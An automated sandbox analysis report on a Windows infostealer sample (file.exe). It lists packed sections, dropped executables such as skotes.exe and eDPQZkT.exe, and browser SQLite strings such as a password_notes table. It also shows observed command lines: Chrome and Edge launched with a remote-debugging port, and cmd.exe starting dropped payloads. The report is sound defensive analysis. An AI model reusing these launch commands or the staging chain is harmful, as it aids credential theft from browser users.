Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAFAEC0 0_2_6CAFAEC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB90EC0 0_2_6CB90EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBD0E20 0_2_6CBD0E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB8EE70 0_2_6CB8EE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAFEFB0 0_2_6CAFEFB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBCEFF0 0_2_6CBCEFF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAF0FE0 0_2_6CAF0FE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC38FB0 0_2_6CC38FB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAF6F10 0_2_6CAF6F10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBB2F70 0_2_6CBB2F70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC30F20 0_2_6CC30F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB5EF40 0_2_6CB5EF40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBF68E0 0_2_6CBF68E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB40820 0_2_6CB40820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB7A820 0_2_6CB7A820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBC4840 0_2_6CBC4840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBB09B0 0_2_6CBB09B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB809A0 0_2_6CB809A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBAA9A0 0_2_6CBAA9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC0C9E0 0_2_6CC0C9E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB249F0 0_2_6CB249F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB46900 0_2_6CB46900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB28960 0_2_6CB28960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB6EA80 0_2_6CB6EA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBA8A30 0_2_6CBA8A30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB9EA00 0_2_6CB9EA00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB6CA70 0_2_6CB6CA70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB90BA0 0_2_6CB90BA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBF6BE0 0_2_6CBF6BE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC1A480 0_2_6CC1A480
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB364D0 0_2_6CB364D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB8A4D0 0_2_6CB8A4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB7A430 0_2_6CB7A430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB54420 0_2_6CB54420
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 29_2_00FBE530 29_2_00FBE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 29_2_00FF78BB 29_2_00FF78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 29_2_00FF8860 29_2_00FF8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 29_2_00FF7049 29_2_00FF7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 29_2_00FB4DE0 29_2_00FB4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 29_2_00FF31A8 29_2_00FF31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 29_2_00FF2D10 29_2_00FF2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 29_2_00FF779B 29_2_00FF779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 29_2_00FE7F36 29_2_00FE7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 29_2_00FB4B30 29_2_00FB4B30
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CC7DAE0 appears 31 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CA7CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CC709D0 appears 121 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CA894D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CB13620 appears 32 times
PE file does not import any functions
Source: random[1].exe.29.dr Static PE information: No import functions for PE file found
Source: ead1a5c329.exe.29.dr Static PE information: No import functions for PE file found
PE file overlay found
Source: random[1].exe.29.dr Static PE information: Data appended to the last section found
Source: ead1a5c329.exe.29.dr Static PE information: Data appended to the last section found
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2038468823.000000006CCC5000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2037943227.000000006CAD2000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: udcxivdk ZLIB complexity 0.994900109291642
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: Section: ZLIB complexity 0.9975306539509536
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: Section: umzmfkfc ZLIB complexity 0.9947566917391957
Source: random[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9975306539509536
Source: random[1].exe.0.dr Static PE information: Section: umzmfkfc ZLIB complexity 0.9947566917391957
Source: skotes.exe.24.dr Static PE information: Section: ZLIB complexity 0.9975306539509536
Source: skotes.exe.24.dr Static PE information: Section: umzmfkfc ZLIB complexity 0.9947566917391957
Source: eDPQZkT[1].exe.29.dr Static PE information: Section: ZLIB complexity 0.9992955942622951
Source: eDPQZkT[1].exe.29.dr Static PE information: Section: tjxhgeed ZLIB complexity 0.9947236824781823
Source: eDPQZkT.exe.29.dr Static PE information: Section: ZLIB complexity 0.9992955942622951
Source: eDPQZkT.exe.29.dr Static PE information: Section: tjxhgeed ZLIB complexity 0.9947236824781823
Source: DocumentsCAEHDBAAEC.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.24.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@74/305@24/34
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAA7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6CAA7030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\JWR9ZH40.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe File created: C:\Users\user\AppData\Local\Temp\6c4b4029-8e55-4937-ab0e-ce964aaaaf02.tmp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2030889962.000000001D524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2037598070.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2038311729.000000006CC7F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2030889962.000000001D524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2037598070.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2038311729.000000006CC7F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2030889962.000000001D524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2037598070.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2038311729.000000006CC7F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2030889962.000000001D524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2037598070.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2038311729.000000006CC7F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2030889962.000000001D524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2037598070.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2038311729.000000006CC7F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2030889962.000000001D524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2037598070.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2030889962.000000001D524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2037598070.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2038311729.000000006CC7F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1779438530.000000001D419000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1689476294.000000001D425000.00000004.00000020.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747925477.0000000005536000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2748767599.000000000551B000.00000004.00000800.00020000.00000000.sdmp, DHIDHIEGIIIECAKEBFBA.0.dr, EHDGIJJDGCBKFIDHIEBK.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2030889962.000000001D524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2037598070.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2030889962.000000001D524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2037598070.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: DocumentsCAEHDBAAEC.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2072,i,6352660947356166951,12031086605631171018,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2284,i,12587034906761633398,4416084436642061147,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1992,i,16538886290713624235,1857347339083574293,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6256 --field-trial-handle=1992,i,16538886290713624235,1857347339083574293,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6436 --field-trial-handle=1992,i,16538886290713624235,1857347339083574293,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCAEHDBAAEC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsCAEHDBAAEC.exe "C:\Users\user\DocumentsCAEHDBAAEC.exe"
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5988 --field-trial-handle=1992,i,16538886290713624235,1857347339083574293,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe "C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCAEHDBAAEC.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2072,i,6352660947356166951,12031086605631171018,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCAEHDBAAEC.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2284,i,12587034906761633398,4416084436642061147,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1992,i,16538886290713624235,1857347339083574293,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6256 --field-trial-handle=1992,i,16538886290713624235,1857347339083574293,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6436 --field-trial-handle=1992,i,16538886290713624235,1857347339083574293,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5988 --field-trial-handle=1992,i,16538886290713624235,1857347339083574293,262144 /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsCAEHDBAAEC.exe "C:\Users\user\DocumentsCAEHDBAAEC.exe"
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe "C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
